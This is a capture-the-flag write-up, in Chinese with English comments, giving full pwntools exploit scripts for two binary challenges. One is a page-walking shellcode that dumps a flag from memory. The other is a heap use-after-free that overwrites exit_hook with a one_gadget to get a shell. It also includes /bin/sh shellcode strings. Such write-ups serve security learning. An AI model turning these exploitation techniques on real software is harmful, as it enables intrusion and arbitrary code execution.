escape_shellcode(pie_orw_shellcode)

写入heap_mem+170地址后,清空除rip外的所有寄存器,然后执行shellcode。

难点在于没有基地址,无法打印bss段中的flag。

注意的点:堆地址高5位和基地址相同,从基地址开始以0x1000为步长逐页读。

write系统调用执行后,rcx寄存器中保存的是下一条指令的地址(堆地址);堆地址和bss段的前几位一样,所以可以采用爆破,爆出flag。

exp

# _*_ coding:utf-8 _*_
from pwn import *
# Verbose tube tracing: every byte sent/received is echoed to the terminal.
context.log_level='debug'
# asm() below must emit x86-64 encoding; the arch is set here, not inferred from the ELF.
context(arch='amd64', os='linux')

# Local process only; no remote() variant is given on this page.
p = process("./escape_shellcode")
elf = ELF("./escape_shellcode")
libc = elf.libc  # resolved but never referenced later in this script

def dbg():
    """Attach gdb to the running target (pwntools gdb.attach). Not called in this script."""
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
# Thin I/O wrappers over the process handle. Every sender passes its payload
# through str(); that only round-trips raw bytes on Python 2 pwntools. On
# Python 3, str(b'...') would send the repr text ("b'...'") rather than the bytes,
# so this header marks the script as Python 2.
s = lambda data :p.send(str(data))
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
# Leak helpers: read up to a byte that is presumably the top byte of a libc/stack
# pointer, keep the trailing pointer bytes and zero-extend to a full word.
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
# eval() of the argument string: only ever pass a literal variable name from this
# script, never text that came from the target or from user input. The lambda's
# parameter `s` also shadows the `s` sender above inside the lambda body.
lg = lambda s :p.success('%s -> 0x%x' % (s, eval(s)))

# Reference shellcode strings carried over from a template; none is used here
# (the payload below is assembled from the `shell` source instead).
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

# First address to dump. Per the prose above, the flag sits in the PIE's bss and
# shares its upper address bits with the heap the shellcode runs from; this is
# the low end of the range that gets walked.
base=0x500000000000

# Page-walking dump loop, written to need no known base address:
#   write(1, rsi, 0x1000)            -- rax=1 is SYS_write, rdi=1 is stdout
#   rsi = (rcx & r14) + r15          -- after `syscall` rcx holds the return
#                                       address, i.e. an address inside this
#                                       shellcode; masking with r14 keeps only
#                                       the upper bits, r15 is a growing page
#                                       offset
#   r15 += 0x1000 ; loop
# There is no check on rax, so a write() that fails on an unmapped page just
# returns an error and the loop moves on to the next page.
# `jmp $-0x19` is a relative jump whose displacement is tied to the exact byte
# encodings of the instructions between `mov rax,1` and the jmp (it appears to
# land on `mov rax,1` -- confirm with a disassembly before editing anything
# in between, since changing an operand can change an instruction length).
shell='''
mov rdi,1
mov rsi,{}
mov rdx,0x1000
mov r14,0xfffff0000000
mov r15,0x1000
mov rax,1
syscall


mov rsi,rcx
and rsi,r14
add rsi,r15
add r15,0x1000
jmp $-0x19
'''.format(base)

# Assemble with the amd64 context set above and hand the bytes to the target.
p.send(asm(shell))

# The dumped pages come back on stdout; scan them for the flag marker.
# str + recvuntil() result concatenation only works on Python 2 (bytes are str there).
p.recvuntil("flag{")
flag = 'flag{'+p.recvuntil("}")
print(flag)

Bank(exit_hook)

题目实现了一个简单的取款机,主要的难点在于无限刷钱,刷够钱才能做事,要不然初始的190块钱不够用。

漏洞点在这里:就是取钱的时候,如果取的钱数和账户里面相等,是不扣钱的,所以利用这个刷钱就行了。

刷够钱以后,后面思路就简单了,泄露堆地址和libc地址,往exit_hook里写入one_gadget即可。

from pwn import *
from LibcSearcher import *
# Local process by default; the remote endpoint is kept as a commented alternative.
r = process("./Bank")
# r = remote('node4.buuoj.cn',29678)
e = ELF("./Bank")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
# Uses the libc the local loader picks for ./Bank; the hard-coded offsets further
# down are tied to one specific libc build, so a different libc needs the
# commented ELF(...) line and recomputed offsets.
libc = e.libc
# libc = ELF('./buu2.23.so')
# Short tube timeout: every recv()/recvuntil() below gives up after 0.5 s.
r.timeout = 0.5
# Thin I/O wrappers over the tube. Payloads are passed through unchanged, so
# callers hand in bytes (Python 3 pwntools).
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)  # duplicate of sa
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
# Pointer-leak helpers: read up to `data`, keep the trailing pointer bytes and
# zero-extend to a full word. Not used in this script (leaks are parsed as hex text).
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
#0x203010
def dbg(cmd):
    """Attach gdb with the given command script, then block until the user continues.

    Not called in this script; left in for interactive debugging.
    """
    gdb.attach(r,cmd)
    pause()

def Login():
    """Log in at the menu with a fixed card number and password.

    The credentials are hard-coded here and presumably belong to the account the
    challenge ships with -- confirm against the binary if the prompts change.
    """
    ru(b'Click:')
    sl(b'Login')
    ru(b'Card Numbers: ')
    sl(b'1111111')
    ru(b'Password: ')
    sl(b'505050')
def Info():
    """Choose the 'Info' menu entry. Not called in this script."""
    ru(b'Click:')
    sl(b'Info')
def put():
    """Choose 'Put' and enter a fixed amount of 400.

    Paired with Deposit() in the main sequence to grow the balance; which of the
    two is the withdrawal the prose describes is not visible here.
    """
    ru(b'Click:')
    sl(b'Put')
    ru(b"How Much? ")
    sl(b'400')
def Deposit():
    """Choose 'Deposit' and enter a fixed amount of 400 (see put())."""
    ru(b'Click:')
    sl(b'Deposit')
    ru(b"How Much? ")
    sl(b'400')
def leak_admin(money): #leak _ptr + 8 * money
    """Transfer `money` to 'admin'.

    Per the original author's note this makes the target print the word at
    ptr + 8 * money; the caller reads the value back after 'I think '. The
    index semantics are not visible here -- confirm in the binary.
    """
    ru(b'Click:')
    sl(b'Transfer')
    ru(b'who? ')
    sl(b'admin')
    ru(b'How much?')
    # Amount is sent as decimal text.
    sl(str(money).encode())
def free_hacker(chunk_addr): #free uaf
    """Transfer 51 to 'hacker', then send `chunk_addr` as decimal text.

    The original author's note marks this as the free() that leaves a dangling
    pointer; what the target does with the address is not visible here.
    Note the address is sent with se() (no newline), unlike the other inputs.
    """
    ru(b'Click:')
    sl(b'Transfer')
    ru(b'who? ')
    sl(b'hacker')
    ru(b'How much?')
    sl(b'51')
    se(str(chunk_addr).encode())
def add_guest(desc):
    """Transfer 10 to 'guest' and send `desc` as the data that follows.

    `desc` is sent raw (no newline), so it should already be bytes of the exact
    length the target expects.
    """
    ru(b'Click:')
    sl(b'Transfer')
    ru(b'who? ')
    sl(b'guest')
    ru(b'How much? ')
    sl(b'10')
    ru(b"data: ")
    se(desc)
def realloc_gohst(size): # change ptr
    """Transfer 11 to 'ghost' and send `size` as decimal text.

    The original author's note says this changes a pointer (presumably via a
    realloc of the target's buffer to `size`). The function waits for the
    quoted 'ghost: ??????? :(' line before returning, so a different response
    makes it time out (r.timeout is 0.5 s).
    """
    ru(b'Click:')
    sl(b'Transfer')
    ru(b'who? ')
    sl(b'ghost')
    ru(b'How much? ')
    sl(b'11')
    ru(b"ghost: &^%$#@! :)")
    se(str(size).encode())
    ru(b'"ghost: ??????? :("')
def abyss(addr):
    """Transfer 1 to 'abyss' and send `addr` raw after the 'hacker: Great!' line.

    `addr` is sent as-is, so the caller passes packed bytes (p64) rather than text.
    """
    ru(b'Click:')
    sl(b'Transfer')
    ru(b'who? ')
    sl(b'abyss')
    ru(b'How much? ')
    sl(b'1')
    ru(b'"hacker: Great!"')
    se(addr)
# ptr = 203050 + 0x555555400000
Login()
put()
# Grow the balance: per the prose, a withdrawal equal to the balance is not
# deducted, so repeating Deposit/Put inflates the account enough for the
# transfers below.
for i in range(20):
    Deposit()
for i in range(20):
    put()
pl1 = b'a'*(0x10)  # unused; pl1 is reassigned before its first use below

# Two reallocs, then read a heap pointer back as hex text ("0x" + 12 digits).
realloc_gohst(0x100)
realloc_gohst(0xe0)
leak_admin(0x23)
ru(b'I think ')
heap = rc(14)
# 0x10 is the distance from the leaked pointer to the heap start -- TODO confirm
# against the target's allocation pattern.
heap_base = int(heap,16) - 0x10
leak("heap_base",heap_base)
# Repeat the realloc pair; the exact reason for eight rounds is not visible here
# (presumably moves the buffer so that index 242 lands on a libc pointer).
for i in range(8):
    realloc_gohst(0x100)
    realloc_gohst(0xe0)
leak_admin(242)
ru(b'I think ')
# NOTE: this rebinds the module-level `libc` (the ELF object) to the leaked text.
libc = rc(14)
# All three offsets below are specific to one libc build; recompute them for
# any other libc (the prose identifies `shell` as a one_gadget and the second
# address as the exit hook).
libc_base = int(libc,16) - 0x1ecbe0
shell = libc_base+0xe6c7e
exit_hook = libc_base + 0x210150
realloc_gohst(0x18)
# Heap offset of the chunk handed to free_hacker() -- build/run specific, TODO confirm.
chunk = heap_base + 0xb40
leak("chunk",chunk)
free_hacker(chunk)
pl1 = b'aaaaaaaa'
# Seven filler allocations, then one whose data is the exit-hook address;
# presumably this walks a freed-chunk list so the final write lands on the hook.
for i in range(7):
    add_guest(pl1)
add_guest(p64(exit_hook))
# Write the one_gadget address through the abyss path and drop to a shell.
abyss(p64(shell))

r.interactive()